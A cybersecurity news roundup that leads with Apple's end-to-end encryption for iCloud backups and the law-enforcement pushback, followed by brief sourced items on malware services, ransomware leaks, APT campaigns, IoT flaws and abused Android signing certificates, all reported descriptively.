Apple beefs up iCloud Encryption
The move could frustrate law enforcement efforts to access criminal evidence
Apple has long touted the privacy benefits of its platform, stating “what happens on your iPhone, stays on your iPhone.”
But this mantra had a crucial caveat: This was only true if users opted not to store backups of their personal data on iCloud. It also meant that Apple held the encryption keys for the backed-up content, which could be used to extract messages, photos, and other documents should law enforcement come knocking on its doors.
Not anymore. Apple last week moved to close this loophole by introducing end-to-end encryption for iCloud backups, photos, and chat histories in what’s a key security upgrade, putting them out of reach of hackers, law enforcement, and even malicious insiders.
Advanced Data Protection, as the new optional setting is called, requires users to set up a recovery method. A failure to do so incurs a steep penalty in that the encrypted data is as good as lost, as Apple doesn’t have the keys in possession.
The changes are likely to heighten conflict between Apple and government agencies, who have decried the lack of access to digital evidence owing to broadening encryption barriers. The FBI said it was “deeply concerned with the threat end-to-end and user-only-access encryption pose.”
In tandem with the new security features, Apple said it's fully canceling its controversial proposals to apply detection of child sexual abuse material, or CSAM, to photos stored in iCloud.
Apple’s new protections are part of a broader push by tech companies to improve customer security. Google recently introduced end-to-end encryption for group chats in its Messages app for Android, and Facebook’s WhatsApp started offering encrypted chat backups a year ago.
What’s trending in security?
📷 Anker’s Eufy cameras have been found to harbor several issues, chief among them being uploading local-only footage to the cloud without user authorization or knowledge. To top it all off, users can watch camera streams using VLC without authentication after obtaining the unique Eufy server URL. The good news is that there’s no proof yet that this has been exploited in the wild. [The Verge]
🌐 A residential proxy service known as BlackProxies is becoming increasingly popular among threat actors looking to obfuscate the originating IP address from which they are conducting their operations. It claims to offer over one million residential and other proxy IP addresses “from all around the world”. Residential proxies make for an ideal option to blend into regular website traffic. The cost for using the service is $14/day, $39/week, or $89 per month. The development comes as a new malware-as-a-service (MaaS) operation named DuckLogs has emerged an option for low-skilled attackers easy access to multiple modules to steal information, log key strokes, access clipboard data, and remote access to the compromised host. [DomainTools / Cyble]
⚠️ A vulnerability identified in the command-and-control (C2) servers of the Mars Stealer malware can be used to delete data collected from infected users, terminate connections to infected systems, and even lock Mars operators out of their own servers by scrambling their admin passwords. The same issue is also present in servers for the Erbium malware. [TechCrunch]
💰 A leak of the internal chats from the Yanluowang ransomware gang, comprising over 2,700 messages, has revealed ties between members of the Yanluowang gang and members of other ransomware operations such as Babuk, Conti, and HelloKitty. [Trellix / The Record]
🚩 Threat intelligence company VulnCheck has detailed seven vulnerabilities in Xiongmai IoT devices, five of which have been exploited in the wild. According to researcher Jacob Baines, there are around 200,000 devices connected to the internet, making them a lucrative target. [VulnCheck]
🎣 A spear-phishing operation carried out by the China-linked Mustang Panda group deployed the Claimloader trojan on infected systems. [LAC]
🌺 An East Asian APT group called Tiger Hibiscus has been linked to a new set of attacks called Operation ShadowTiger that took place from 2019 to 2021 and involved the use of spear-phishing, browser and intranet zero-days, and an intranet watering-hole attack. [QiAnXin]
🪷 In another report, the Chinese cybersecurity company shed light on new attacks mounted by OceanLotus (aka APT32), a Vietnamese state-sponsored group, targeting Chinese entities through exploitation of zero-days flaws. [Qi’anxin]
💵 In what could be a new trend, companies infected with purported ransomware may no longer have an option to pay a ransom. Threat actors are dabbling with ransomware programs that encrypt files and demand a ransom, but are actually designed to irrevocably overwrite the contents of a victim’s files. These camouflaged data wipers have witnessed a surge since the onset of the Russo-Ukrainian war this year. [The Hacker News]
🔝 An analysis of top 100 sites in 25 countries has revealed that websites from Hong Kong have 45 trackers on average, followed by 33 in Singapore and 23 in the U.S. Austria, Denmark, and Sweden, in contrast, have only 11 trackers, with websites in the U.K., France, and Spain having roughly 18 trackers per website. [NordVPN]
🗄️ Stolen data of five million people globally, including 600,000 Indians, have been sold on the Genesis, Russian, and 2easy bot markets for ~$6 on average. In a related research conducted by researchers from the University of South Florida and Georgia State University, 30 darknet places recorded 632,207 sales between September 1, 2020, and April 30, 2021, netting $140,337,999 in total revenue. On average, the marketplaces had 26,342 sales and generated $5,847,417 in revenue. [NordVPN / Ars Technica]
⬇️ Threat actors leveraging an open source tool called PRoot to expand the scope of their operations to multiple Linux distributions, such as such as Ubuntu, Fedora, and Alpine. The attacks, dubbed BYOF (Bring Your Own Filesystem), entail using the legitimate utility to build a malicious filesystem that contains the toolset, masscan, nmap, and XMRig cryptominer, necessary to conduct attacks. It is then deployed on already compromised systems. “Using PRoot, there is little regard or concern for the target’s architecture or distribution since the tool smoothes out the attack struggles often associated with executable compatibility, environment setup, and malware and/or miner execution,” Sysdig said. “It allows attackers to get closer to the philosophy of 'write once, run everywhere,' which is a long sought-after goal.” [Sysdig]
🔻 Misconfigurations in Domain Name System (DNS) implementation in an enterprise environment can put air-gapped networks and the high-value assets they are aimed at protecting at risk from external threat actors. This attack allows DNS requests to be used as a command-and-control (C2) channel to communicate with the networks through DNS servers connected to the Internet. [Pentera]
✉️ Cybercrime marketplaces are selling stolen corporate email access for U.S.-based companies for as low as $2 to fill a growing demand by hackers who use them for business email compromise and phishing attacks or initial access to networks for stealing sensitive information. Ransomware operators have also been observed offering email access to a Canadian aerospace company for $15,000. These credentials are obtained through brute-force attacks, deploying information stealers, or credential stuffing. [Bleeping Computer]
💲 North Korean IT workers are taking up freelancing jobs by presenting themselves as non-North Korean nationals to earn money that the nation’s authoritarian government uses to finance the development of missiles and nuclear weapons for the regime. “DPRK IT workers favor online text-based chat instead of video interviews,” South Korea’s Ministry of Science and ICT (MSIT) warned. “DPRK IT workers are highly skilled when it comes to software development, and some of them are proficient in foreign languages, including English.” [MSIT]
🔗 New research has found a third-party service dubbed Zombinder that provides the “glue” to bind malicious capabilities to legitimate Android apps. It’s offered by an “actor well-known in the threat landscape” on the darknet. The service is being used banking trojans like ERMAC, SOVA, and Xenomorph. [The Hacker News]
🔏 Google shed more light on Private Compute Core (PCC), an open source component that sandboxes machine learning features locally on Android devices and isolates the information from being sent and processed in the cloud. “PCC is designed to enable innovative features while keeping the data needed for them confidential from other subsystems” by limiting Interprocess Communications (IPC) binds and using isolated processes, the tech giant said. [Google Security Blog]
🚨 Platform certificates from companies like Samsung, LG, and MediaTek, which are used to sign software and Android versions, have been found to be used to sign malicious Android apps, potentially granting them elevated privileges to harvest sensitive information from compromised devices without having to explicitly ask for users’ consent. This is what makes the attack insidious, as Android malware traditionally works by tricking users into granting it intrusive permissions before it can carry out its malicious activities. [The Hacker News]
⬆️ Keeping track of the various names that are given by different cyberesecurity companies to the same threat actor can be quite the task. But here's a quick primer to get you started. [Chad Warner / Florian Roth]